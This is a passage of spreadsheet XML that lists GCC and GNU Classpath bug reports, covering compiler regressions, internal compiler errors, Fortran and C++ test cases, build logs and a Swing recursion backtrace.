 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o tp /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../../../i686-pc-linux-gnu/lib -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../.. tp.o -lstdc++ -lm -lgcc -lc -lgcc /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/crtend.o /usr/lib/crtn.o
Bzip2 compressed preprocessed source file tp.ii.bz2 follows
See attachments for tp.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-67422</t>
  </si>
  <si>
    <t>memcpy incorrectly used to copy (potentially) overlapping assumed-size arrays</t>
  </si>
  <si>
    <t>The assembler code implementation for
subroutine move_buggy(a b n)
    integer :: n i
    integer dimension(*) :: a b
    do i = 1 n
        a(i) = b(i)
    end do
end subroutine move_buggy
generated with
gfortran -S move_buggy.f90 -O3
or more condensed with
gfortran -S move_buggy.f90 -O1 -ftree-loop-distribute-patterns -foptimize-sibling-calls -fstrict-overflow
will replace the loop with a call to memcpy. memcpy is not guaranteed to work if the memory locations for a and b overlap which could be the case here. Thus the above code will not execute as expected (depending on the implementation of memcpy) when these optimizations are used. Thus memcpy should not be used here.
The bug is present in gfortran 5.2.1 and 4.9.3 (details below) but NOT in 4.7.2.
&gt; gfortran-5 -v
Using built-in specs.
COLLECT_GCC=gfortran-5
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/5/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 5.2.1-15' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 5.2.1 20150808 (Debian 5.2.1-15)
&gt; gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.9.3-4' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.3 (Debian 4.9.3-4)
&gt; gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.7/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.2-5' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.7.2 (Debian 4.7.2-5)</t>
  </si>
  <si>
    <t>boris.carlsson</t>
  </si>
  <si>
    <t>GCC-37203</t>
  </si>
  <si>
    <t>Check ORDER= of RESHAPE</t>
  </si>
  <si>
    <t>Found at http://groups.google.com/group/gg95/browse_thread/thread/d27f173506fbb9cc
The following program compiles without any warning but NAG f95 prints:
Error: line 6: Value 2 in ORDER arg to RESHAPE duplicated
integer dimension(6) :: source1 = (/ 1 2 3 4 5 6 /)
integer dimension(2) :: shape1 = (/ 2 5/)
integer dimension(2) :: pad1 = (/ 0 0/)
write (unit=*fmt=*) reshape(source1 shape1 pad1 (/21/)) ! Valid
write (unit=*fmt=*) reshape(source1 shape1 pad1 (/22/)) ! Invalid
end</t>
  </si>
  <si>
    <t>GCC-36756</t>
  </si>
  <si>
    <t>[4.4 Regression] g++.dg/tls-3.C ICE with section-anchors unit-at-a-time no-toplevel-reorder</t>
  </si>
  <si>
    <t>Test g++.dg/gomp/tls-3.C started failing on powerpc-unknown-linux-gnu with an ICE in rs6000_emit_move when the -O0 defaults were changed for -funit-at-a-time -fsection-anchors and -ftop-level-reorder.  This smaller C test:
__thread int i
int
foo ()
{
  static __thread int k
  return k
}
gets the same ICE for earlier compilers back to 4.2.0 (when section anchors were added) when compiled with -funit-at-a-time -fsection-anchors -fno-toplevel-reorder.</t>
  </si>
  <si>
    <t>GCC-51072</t>
  </si>
  <si>
    <t>[4.7 Regression] Build with --disable-bootstrap fails in libitm</t>
  </si>
  <si>
    <t>GCC-17863</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] performance loss (TER register presure and inlining limits problems)</t>
  </si>
  <si>
    <t>I see a threefold performance loss. This is a rather big chunk of code and it is
probably difficult to extract a small testcase because there is no pronounced
hot spot. To reproduce just compile and run the code.
commandline: g++ -O3 -march=pentium4 ttest.cc -o t34a -static
Execution time of the compiled code:
with GCC 3.4.1: 6.6s
with todays GCC 4.0.0: 18.9s
machine is a 2.4 GHz P4.</t>
  </si>
  <si>
    <t>GCC-15577</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE when inlining accessor and passing array value by reference pointer</t>
  </si>
  <si>
    <t>Probably an inliner bug.  Fails in mainline as of now.
g++ -O3 vv.cc
vv.cc: In function `long int intrand()':
vv.cc:8: internal compiler error: in emit_move_insn at expr.c:2799
static long seeds[100]
long opp_nextrand(long&amp; seed)
{
     return seed
}
long intrand()
{
    return opp_nextrand(seeds[0])
}
First dump after inlining (gimple) looks like
      long int 
             = seeds
which is wrong as seeds is an array.</t>
  </si>
  <si>
    <t>GCC-54092</t>
  </si>
  <si>
    <t>[4.8 Regression] Bootstrap fails while building Ada at stage 1</t>
  </si>
  <si>
    <t>Bootstrap fails on x86_64-apple-darwin10 while building Ada at stage 1 (likely revision 189821):
g++ -c   -g -DIN_GCC   -fno-exceptions -fno-rtti -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual  -Wmissing-format-attribute -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I.. -I. -Iada -I../../work/gcc -I../../work/gcc/ada -I../../work/gcc/../include -I./../intl -I../../work/gcc/../libcpp/include -I/opt/mp/include  -I../../work/gcc/../libdecnumber -I../../work/gcc/../libdecnumber/dpd -I../libdecnumber -DCLOOG_INT_GMP  -I/opt/mp/include  ../../work/gcc/ada/gcc-interface/trans.c -o ada/trans.o
In file included from ../../work/gcc/libfuncs.h:24:0
                 from ../../work/gcc/ada/gcc-interface/trans.c:34:
../../work/gcc/optabs.h:51:35: error: 'NUM_RTX_CODE' was not declared in this scope
 extern const optab code_to_optab_[NUM_RTX_CODE]
                                   ^
../../work/gcc/optabs.h:52:19: error: use of enum 'rtx_code' without previous declaration
 extern const enum rtx_code optab_to_code_[NUM_OPTABS]
                   ^
../../work/gcc/optabs.h:52:54: error: invalid type in declaration before '' token
 extern const enum rtx_code optab_to_code_[NUM_OPTABS]
                                                      ^
../../work/gcc/optabs.h:55:21: error: use of enum 'rtx_code' without previous declaration
 code_to_optab (enum rtx_code code)
                     ^
../../work/gcc/optabs.h: In function 'optab code_to_optab(int)':
../../work/gcc/optabs.h:57:10: error: 'code_to_optab_' was not declared in this scope
   return code_to_optab_[code]
          ^
../../work/gcc/optabs.h: At global scope:
../../work/gcc/optabs.h:60:20: error: use of enum 'rtx_code' without previous declaration
 static inline enum rtx_code
                    ^
../../work/gcc/optabs.h:88:39: warning: 'expand_widen_pattern_expr' initialized and declared 'extern' [enabled by default]
 extern rtx expand_widen_pattern_expr (sepops ops rtx op0 rtx op1 rtx wide_op
                                       ^
../../work/gcc/optabs.h:88:39: error: 'sepops' was not declared in this scope
../../work/gcc/optabs.h:88:55: error: expected primary-expression before 'op0'
 extern rtx expand_widen_pattern_expr (sepops ops rtx op0 rtx op1 rtx wide_op
                                                       ^
../../work/gcc/optabs.h:88:64: error: expected primary-expression before 'op1'
 extern rtx expand_widen_pattern_expr (sepops ops rtx op0 rtx op1 rtx wide_op
                                                                ^
../../work/gcc/optabs.h:88:73: error: expected primary-expression before 'wide_op'
 extern rtx expand_widen_pattern_expr (sepops ops rtx op0 rtx op1 rtx wide_op
                                                                         ^
../../work/gcc/optabs.h:89:43: error: expected primary-expression before 'target'
                                       rtx target int unsignedp)
                                           ^
../../work/gcc/optabs.h:89:51: error: expected primary-expression before 'int'
                                       rtx target int unsignedp)
                                                   ^
../../work/gcc/optabs.h:89:64: error: expression list treated as compound expression in initializer [-fpermissive]
                                       rtx target int unsignedp)
                                                                ^
../../work/gcc/optabs.h:97:10: error: use of enum 'optab_methods' without previous declaration
     enum optab_methods)
          ^
../../work/gcc/optabs.h:101:12: error: use of enum 'optab_methods' without previous declaration
       enum optab_methods methods)
            ^
../../work/gcc/optabs.h:104:10: error: use of enum 'optab_methods' without previous declaration
     enum optab_methods)
          ^
../../work/gcc/optabs.h:108:25: error: use of enum 'optab_methods' without previous declaration
          rtx int enum optab_methods)
                         ^
../../work/gcc/optabs.h:119:12: error: use of enum 'rtx_code' without previous declaration
       enum rtx_code)
            ^
../../work/gcc/optabs.h:136:60: error: use of enum 'rtx_code' without previous declaration
 extern void emit_unop_insn (enum insn_code rtx rtx enum rtx_code)
                                                            ^
../../work/gcc/optabs.h:137:66: error: use of enum 'rtx_code' without previous declaration
 extern bool maybe_emit_unop_insn (enum insn_code rtx rtx enum rtx_code)
                                                                  ^
../../work/gcc/optabs.h:174:32: error: use of enum 'rtx_code' without previous declaration
 extern int can_compare_p (enum rtx_code enum machine_mode
                                ^
../../work/gcc/optabs.h:237:35: warning: 'expand_vec_shift_expr' initialized and declared 'extern' [enabled by default]
 extern rtx expand_vec_shift_expr (sepops rtx)
                                   ^
../../work/gcc/optabs.h:237:35: error: 'sepops' was not declared in this scope
../../work/gcc/optabs.h:237:46: error: expected primary-expression before ')' token
 extern rtx expand_vec_shift_expr (sepops rtx)
                                              ^
../../work/gcc/optabs.h:237:46: error: expression list treated as compound expression in initializer [-fpermissive]
../../work/gcc/optabs.h: In function 'void create_integer_operand(expand_operand* long int)':
../../work/gcc/optabs.h:453:61: error: 'GEN_INT' was not declared in this scope
   create_expand_operand (op EXPAND_INTEGER GEN_INT (intval) VOIDmode false)
                                                             ^</t>
  </si>
  <si>
    <t>CLASSPATH-27484</t>
  </si>
  <si>
    <t>Loop in javax.swing.DefaultDesktopManager.closeFrame()</t>
  </si>
  <si>
    <t>When running openjump with the CVS version of GNU Classpath and jamvm I get
a java.lang.StackOverflowError when I try to close the current map project using
the small x in the upper right corner of the internal window.  The problem
seem to be an endless recursion.  This is the start of the backtrace including
the looping part.  I'll attach the full backtrace.
[...]
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame$13.internalFrameClosing(WorkbenchFrame.java:568)
   at javax.swing.JInternalFrame.fireInternalFrameEvent(JInternalFrame.java:700)   at javax.swing.JInternalFrame.doDefaultCloseAction(JInternalFrame.java:673)
   at javax.swing.DefaultDesktopManager.closeFrame(DefaultDesktopManager.java:127)
   at com.vividsolutions.jump.workbench.ui.GUIUtil.dispose(GUIUtil.java:1168)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame.closeTaskFrame(WorkbenchFrame.java:1072)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame.access$0(WorkbenchFrame.java:1066)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame$DefaultInternalFrameCloser.close(WorkbenchFrame.java:1035)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame$13.internalFrameClosing(WorkbenchFrame.java:568)
   at javax.swing.JInternalFrame.fireInternalFrameEvent(JInternalFrame.java:700)   at javax.swing.JInternalFrame.setClosed(JInternalFrame.java:1307)
   at javax.swing.plaf.basic.BasicInternalFrameTitlePane$CloseAction.actionPerformed(BasicInternalFrameTitlePane.java:104)
   at javax.swing.AbstractButton.fireActionPerformed(AbstractButton.java:1099)
   at javax.swing.AbstractButton$1.actionPerformed(AbstractButton.java:1909)
   at javax.swing.DefaultButtonModel.fireActionPerformed(DefaultButtonModel.java:298)
   at javax.swing.DefaultButtonModel.setPressed(DefaultButtonModel.java:403)
   at javax.swing.plaf.basic.BasicButtonListener.mouseReleased(BasicButtonListener.java:188)
   at java.awt.Component.processMouseEvent(Component.java:3105)
   at java.awt.Component.processEvent(Component.java:2964)
   at java.awt.Container.processEvent(Container.java:914)
   at java.awt.Component.dispatchEventImpl(Component.java:5033)
   at java.awt.Container.dispatchEventImpl(Container.java:1741)
   at java.awt.Component.dispatchEvent(Component.java:2322)
   at java.awt.LightweightDispatcher.handleMouseEvent(LightweightDispatcher.java:197)
   at java.awt.LightweightDispatcher.dispatchEvent(LightweightDispatcher.java:116)
   at java.awt.Container.dispatchEventImpl(Container.java:1731)
   at java.awt.Window.dispatchEventImpl(Window.java:642)
   at java.awt.Component.dispatchEvent(Component.java:2322)
   at java.awt.EventQueue.dispatchEvent(EventQueue.java:474)
   at java.awt.EventDispatchThread.run(EventDispatchThread.java:75)</t>
  </si>
  <si>
    <t>GCC-18325</t>
  </si>
  <si>
    <t>[4.0 regression] mmix-knuth-mmixware testsuite failure: gcc.c-torture/execute/20020227-1.c (change in behavior)</t>
  </si>
  <si>
    <t>Public note of failure.  The test results have changed
so test needs revisit and/or 20020227-1.x needs tweaking.
With LAST_UPDATED: Sat Nov  6 19:25:03 GMT 2004 I get:
FAIL: gcc.c-torture/execute/20020227-1.c compilation  -O2
XPASS: gcc.c-torture/execute/20020227-1.c execution  -O3 -fomit-frame-pointer
XPASS: gcc.c-torture/execute/20020227-1.c execution  -O3 -g
FAIL: gcc.c-torture/execute/20020227-1.c compilation  -Os
With the message in the .log being for failing execution:
*** EXIT code 4242
(i.e. abort call)
for failing compilation:
gcc/testsuite/gcc.c-torture/execute/20020227-1.c: In function 'f1':
gcc/testsuite/gcc.c-torture/execute/20020227-1.c:23: internal compiler error: in
simplify_immed_subreg at simplify-rtx.c:3546</t>
  </si>
  <si>
    <t>GCC-83178</t>
  </si>
  <si>
    <t>[8 regression] g++.dg/ipa/devirt-22.C fail</t>
  </si>
  <si>
    <t>r255104 triggers this:
spawn -ignore SIGHUP /work/gcc/testsuite/g++6/../../xg++ -B/work/gcc/testsuite/g++6/../../ /source/gcc/testsuite/g++.dg/ipa/devirt-22.C -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/work/x86_64-pc-linux-gnu/libstdc++-v3/include/x86_64-pc-linux-gnu -I/work/x86_64-pc-linux-gnu/libstdc++-v3/include -I/source/libstdc++-v3/libsupc++ -I/source/libstdc++-v3/include/backward -I/source/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++98 -O3 -fno-early-inlining -fno-ipa-sra -fdump-ipa-cp -S -o devirt-22.s
PASS: g++.dg/ipa/devirt-22.C  -std=gnu++98 (test for excess errors)
FAIL: g++.dg/ipa/devirt-22.C  -std=gnu++98  scan-ipa-dump-times cp Discovered a virtual call to a known target 1 (found 2 times)
Option set:
-with-system-zlib --with-demangler-in-ld --with-fpmath=sse --enable-shared --enable-host-shared --enable-clocale=gnu --enable-cloog-backend=isl --enable-languages=cc++fortranjitlto -with-arch=haswell --with-cpu=haswell</t>
  </si>
  <si>
    <t>GCC-31011</t>
  </si>
  <si>
    <t>[4.2 and 4.1 only] Incorrect error: parameter array sections</t>
  </si>
  <si>
    <t>On a 64-bit Ubuntu 6.10 system with gcc-4.2-20070228 gfortran erroneously gives an error for good F90 code.  In the code two parameter arrays are defined then one is multiplied by a section of the other with the section selected with non-unit stride.  An error is generated referencing the declaration of the sectioned array.  It looks like the array section is not being generated properly but simply writing the array section to stdout produces the expected output.
The error is not produced if either of the arrays are not parameters or the array section is unit stride.  gfortran from Ubuntu's gcc-4.1.2 gives the same error.
[tjf@fkpc167 VielPotential]$ cat bugtest.f90 
program PotentialMatrix
implicit none
real(kind=8)dimension(2)parameter::v2=(/12/)
real(kind=8)dimension(4)parameter::v4=(/1234/)
write(**)v2*v4(1:3:2)
end
[tjf@fkpc167 VielPotential]$ gfortran -v -g -o bugtest bugtest.f90
Driving: gfortran -v -g -o bugtest bugtest.f90 -lgfortranbegin -lgfortran -lm -shared-libgcc
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --disable-multilib --enable-languages=fortran
Thread model: posix
gcc version 4.2.0 20070228 (prerelease)
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.2.0/f951 bugtest.f90 -quiet -dumpbase bugtest.f90 -mtune=generic -auxbase bugtest -g -version -I /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.2.0/finclude -o /tmp/cc5EhKbq.s
GNU F95 version 4.2.0 20070228 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.2.0 20070228 (prerelease).
GGC heuristics: --param ggc-min-expand=89 --param ggc-min-heapsize=112046
bugtest.f90:3.40:
real(kind=8)dimension(2)parameter::v2=(/12/)
                                       1
Error: different shape for Elemental binary operation at (1) on dimension 1 (2/1)
bugtest.f90:3.40:
real(kind=8)dimension(2)parameter::v2=(/12/)
                                       1
Error: Array operands are incommensurate at (1)
[tjf@fkpc167 VielPotential]$</t>
  </si>
  <si>
    <t>GCC-61826</t>
  </si>
  <si>
    <t>[4.10 regression] gcc.dg/pr44024.c UNRESOLVED</t>
  </si>
  <si>
    <t>Between 20140711 and 20140716 the gcc.dg/pr44024.c testcase became UNRESOLVED.
gcc.log shows
PASS: gcc.dg/pr44024.c (test for excess errors)
gcc.dg/pr44024.c: dump file does not exist
UNRESOLVED: gcc.dg/pr44024.c scan-tree-dump-not ccp1 foo
and indeed -fdump-tree-ccp1 dumps nothing here unlike -fdump-tree-original
before this change:
2014-07-13  Jan Hubicka  
	* gcc.dg/pr36901.h: Simplify because non-zero symbol folding no
	longer happens during parsing.
	* gcc.dg/pr44024.c: Update template.
This is a regression from 4.9.
  Rainer</t>
  </si>
  <si>
    <t>GCC-82451</t>
  </si>
  <si>
    <t>[GRAPHITE] codegen error in get_rename_from_scev</t>
  </si>
  <si>
    <t>Another case.
Here we end up with an evolution in the containing loop (that is not part of the scop).  But we don't know how to code-gen that.  Given we introduced the dimension
in a way the counting IV would always be zero but did _not_ invent a real loop.
So we're missing a parameter to the SCOP I guess specifying that single value
corresponding to the outer loop canonical IV.
Will attach testcases.</t>
  </si>
  <si>
    <t>GCC-9259</t>
  </si>
  <si>
    <t>Calling a non-qualified member function within a sizeof() expression leads to invalid use of undefined type</t>
  </si>
  <si>
    <t>This surprisingly simple piece of code (modified from 
BOOST) does not (and did never with any version of gcc)
compile:
------------------------------
struct S 
{
    static int check ()
    static const int value = sizeof(check())
}
------------------------------
tmp/g&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c h.cc
h.cc:4: error: invalid use of undefined type `struct S'
h.cc:2: error: forward declaration of `struct S'
Volker (with help by Comeau's and SGI's compilers) and icc 
also agree that this should compile.
W.
Release:
unknown
Environment:
since at least 2.95 and up to present 3.4</t>
  </si>
  <si>
    <t>GCC-39998</t>
  </si>
  <si>
    <t>Procedure Pointer Assignments: Statement Functions &amp; Internal Functions</t>
  </si>
  <si>
    <t>According to the following passage of the Fortran 2003 standard statement functions and internal functions are forbidden in procedure pointer assignments:
C727 (R742) A procedure-name shall be the name of an external module or dummy procedure a specific intrinsic function listed in 13.6 and not marked with a bullet (â€¢) or a procedure pointer.
Test cases:
f(x) = x**2
procedure() pointer :: p
p =&gt; f
print * p(4.0)
end
**********
 procedure() pointer :: p
 p =&gt; sub
contains
 subroutine sub
 end subroutine sub
end
**********
Internal functions however are valid in Fortran 2008.
Thanks to Tobias for reporting this.</t>
  </si>
  <si>
    <t>GCC-27916</t>
  </si>
  <si>
    <t>Problem with allocatable arrays inside OpenMP do loop</t>
  </si>
  <si>
    <t>I've stumbled on a gfortran Fortran runtime error when using allocatable arrays inside OpenMP PARALLEL DO LOOPS
Consider the folowing reduced testcase.
 &gt;&gt; cat allocate_in_loop.f90
program allocate_in_loop
  use omp_lib only: omp_get_num_threadsomp_get_thread_num
  implicit none
  integer :: numthreadsniti
  integer dimension(:) allocatable :: int_array
  !
!$OMP PARALLEL DEFAULT(shared) NUM_THREADS(4)
   numthreads=omp_get_num_threads()
!$OMP DO PRIVATE(nitint_arrayi) SCHEDULE(static)
  do n=1numthreads
     it=omp_get_thread_num()
     allocate(int_array(3))
        do i=13
           int_array(i)=(it)*100+i
           write(*'(ai2ai1ai4)') 'thread :'it' --&gt;int_array(' &amp;
                                       i')='int_array(i)
        end do
     deallocate(int_array)
  end do
!$OMP END DO
!
!$OMP END PARALLEL
end program allocate_in_loop
According to what I read in the OpenMP 2.5 Specification - in sections 2.8.3.3 page 75 - the usage of the allocatable array is correct since I allocate it and
deallocate inside the OMP loop and it is not allocated upon entering the OMP DO
loop.
Gfortran compile fine with
&gt;&gt; gfortran -fopenmp allocate_in_loop.f90
But fails on execution with: Fortran runtime error: Attempting to allocate already allocated array.
intel 9.1 pgi 6.1 and xl do fine the output being for example...
 &gt;&gt; ./a.out
thread : 0 --&gt; int_array(1)=   1
thread : 0 --&gt; int_array(2)=   2
thread : 0 --&gt; int_array(3)=   3
thread : 1 --&gt; int_array(1)= 101
thread : 1 --&gt; int_array(2)= 102
thread : 1 --&gt; int_array(3)= 103
thread : 2 --&gt; int_array(1)= 201
thread : 2 --&gt; int_array(2)= 202
thread : 2 --&gt; int_array(3)= 203
thread : 3 --&gt; int_array(1)= 301
thread : 3 --&gt; int_array(2)= 302
thread : 3 --&gt; int_array(3)= 303
Good bug squashing
Benjamin</t>
  </si>
  <si>
    <t>benjamin.reveille</t>
  </si>
  <si>
    <t>GCC-24745</t>
  </si>
  <si>
    <t>unpleasant warning for if (NULL)</t>
  </si>
  <si>
    <t>C++ programs with if (NULL) generate an unpleasant warning even with default compiler options.  Code with if (NULL) comes from of macro expansion or auto-generated code.
Warnings are a matter of taste so I won't ask make all the warnings match my taste but I do petition you to revisit which of these lines should generate warnings and apply your own taste.
This patch looks like the last time these warnings were modified:
http://gcc.gnu.org/ml/gcc-patches/2005-01/msg02230.html
Mark Mitchell C++ PATCH: PR 19457 a PR 19349
Test program:
int foo() {
  if (__null) return -1
  if (!__null)  else return -1
  if (__null == __null)  else return -1
  if (__null != __null) return -1
  if (__null == __null)  else return -1
  if (__null != 0)  else return -1
  return 0
}
int main() {
  return foo() == 0
}
Warnings shown:
hollerith:~/null-arithmetic$ /home/mec/gcc-4.0.2/install/bin/gcc -c null-arithmetic.cc
null-arithmetic.cc: In function 'int foo()':
null-arithmetic.cc:2: warning: converting to non-pointer type 'bool' from NULL
null-arithmetic.cc:3: warning: converting to non-pointer type 'bool' from NULL
null-arithmetic.cc:4: warning: NULL used in arithmetic
null-arithmetic.cc:5: warning: NULL used in arithmetic
null-arithmetic.cc:6: warning: NULL used in arithmetic
null-arithmetic.cc:7: warning: NULL used in arithmetic
hollerith:~/null-arithmetic$ /home/mec/gcc-4.1-20051105/install/bin/gcc -c null-arithmetic.cc
null-arithmetic.cc: In function 'int foo()':
null-arithmetic.cc:2: warning: converting to non-pointer type 'bool' from NULL
null-arithmetic.cc:3: warning: converting to non-pointer type 'bool' from NULL
null-arithmetic.cc:4: warning: NULL used in arithmetic
null-arithmetic.cc:5: warning: NULL used in arithmetic
null-arithmetic.cc:6: warning: NULL used in arithmetic
null-arithmetic.cc:7: warning: NULL used in arithmetic</t>
  </si>
  <si>
    <t>GCC-13266</t>
  </si>
  <si>
    <t>[tree-ssa] ICE in add_may_alias in tree-dfa.c for C++ source code</t>
  </si>
  <si>
    <t>I use the tree-ssa gcc version from December 1st: 
$ ~/gcc-3.5-tree-ssa/bin/g++ --version 
g++ (GCC) 3.5-tree-ssa 20031201 (merged 20031130) 
I compile with optimisation with the options 
/home/eschnett/gcc-3.5-tree-ssa/bin/g++ -DCARPET_INT -DCARPET_REAL 
-DCARPET_COMPLEX -march=pentium3 -malign-double -m128bit-long-double -g -O3 
-funroll-loops -Wall -Wpointer-arith -Wcast-qual -Wcast-align -c -o /home/
eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc.o /home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/
CarpetInterp/interp.cc -I/usr/include -I/usr/lib/mpich/include -I/usr/lib/
petscdir/2.1.6/include -I/usr/lib/petscdir/2.1.6/bmake/linux -I/home/eschnett/
Calpha/Cactus/arrangements/Carpet/CarpetInterp/src -I/home/eschnett/Calpha/
Cactus/arrangements/Carpet/CarpetInterp/src/include -I/home/eschnett/Calpha/
Cactus/configs/einstein-gfortran/config-data -I/home/eschnett/Calpha/Cactus/
configs/einstein-gfortran/bindings/include -I/home/eschnett/Calpha/Cactus/src/
include -I/home/eschnett/Calpha/Cactus/arrangements -I/home/eschnett/Calpha/
Cactus/arrangements/Carpet/CarpetInterp/src -I/home/eschnett/Calpha/Cactus/
arrangements/Carpet/CarpetInterp/src/include -DTHORN_IS_CarpetInterp -DCCODE 
and receive the error message 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc: In function `int CarpetInterp::InterpGridArrays(const cGH* int 
int int int int int const void* const* int const int* int const int* 
void* const*)': 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc:307: warning: cast from `const cGH* const' to `cGH*' discards 
qualifiers from pointer target type 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc:310: warning: cast from `const cGH* const' to `cGH*' discards 
qualifiers from pointer target type 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc:313: warning: cast from `const cGH* const' to `cGH*' discards 
qualifiers from pointer target type 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc:477: warning: cast from `const cGH* const' to `cGH*' discards 
qualifiers from pointer target type 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc:480: warning: cast from `const cGH* const' to `cGH*' discards 
qualifiers from pointer target type 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc:483: warning: cast from `const cGH* const' to `cGH*' discards 
qualifiers from pointer target type 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran/build/CarpetInterp/
interp.cc:97: internal compiler error: in add_may_alias at tree-dfa.c:2233 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
I attach the preprocessed source code.</t>
  </si>
  <si>
    <t>GCC-65353</t>
  </si>
  <si>
    <t>[5 Regression] unknown ptrSize for $GOARCH arm64 on aarch64-linux-gnu</t>
  </si>
  <si>
    <t>$ go tool cgo -godefs types.go
unknown ptrSize for $GOARCH arm64
with a separately built go tool (1.2) built using gccgo-4.9 this works as expected.
filing this as a regression for now.
$ cat types.go 
// +build ignore
package pty
import C
type (
        _C_int  C.int
        _C_uint C.uint
)
$ go tool cgo -godefs types.go
// Created by cgo -godefs - DO NOT EDIT
// cgo -godefs types.go
package pty
type (
        _C_int  int32
        _C_uint uint32
)</t>
  </si>
  <si>
    <t>GCC-36018</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] powerpc64: ICE in copy_to_mode_reg at explow.c:621</t>
  </si>
  <si>
